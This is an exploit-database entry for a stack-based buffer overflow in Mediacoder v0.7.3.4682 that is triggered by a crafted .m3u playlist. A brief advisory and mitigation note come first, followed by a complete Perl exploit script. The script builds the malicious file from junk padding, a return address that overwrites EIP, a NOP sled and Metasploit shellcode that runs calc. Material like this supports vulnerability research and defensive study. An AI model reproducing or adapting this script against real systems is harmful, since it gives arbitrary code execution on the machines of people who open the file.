Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit

vendor:

Mediacoder

by:

s-dz

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Mediacoder

Affected Version From: v0.7.3.4682

Affected Version To: v0.7.3.4682

Patch Exists: YES

Related CWE: N/A

CPE: a:mediacoder:mediacoder

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP 2 (FR)

2010

Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit

Mediacoder v0.7.3.4682 is vulnerable to a buffer overflow vulnerability when processing specially crafted .m3u files. This vulnerability can be exploited by an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused due to a boundary error when processing the .m3u file. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted .m3u file with an overly long string in the first line.

Mitigation:

Upgrade to the latest version of Mediacoder v0.7.3.4682 or later.

Source

Exploit-DB raw data:

#!/usr/bin/perl 

################################################################### 

#Exploit Title : Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit 

#tested on windows xp SP 2 (FR) 

#Date:24/07/2010

#download : http://www.dodownload.com/video+multimedia/play+video/mediacoder.html 

#Author: s-dz [s-dz[at]HotmaiL.fr] 

# Tjrs mahboul-3lik  ;)

################################################################### 

$file= "mahboul-3lik.m3u";


my $junk = "\x41" x 256;


my $eip = pack('V', 0x66086687);# libiconv-2.dll

my $nop ="\x90"x 24;

 # windows/exec 

 # http://www.metasploit.com 

 # EXITFUNC=thread, CMD=calc 

my $sec =

"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . 

"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . 

"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . 

"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . 

"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . 

"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . 

"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . 

"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . 

"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . 

"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . 

"\x7f\xe8\x7b\xca"; 



open($FILE, ">$file"); 

print($FILE $junk.$eip.$nop.$sec); 

close($FILE); 

print("exploit created successfully");